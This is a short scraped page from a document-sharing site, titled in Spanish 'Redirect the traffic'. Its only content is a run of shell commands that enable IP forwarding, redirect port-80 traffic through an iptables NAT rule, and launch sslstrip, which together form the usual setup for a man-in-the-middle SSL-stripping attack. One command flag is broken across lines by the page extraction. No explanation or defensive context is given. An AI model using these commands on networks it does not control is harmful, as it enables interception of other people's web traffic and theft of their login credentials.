Redireccionar El Trafico

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-por
1600
iptables -L -t nat
sslstrip -l 1600

You might also like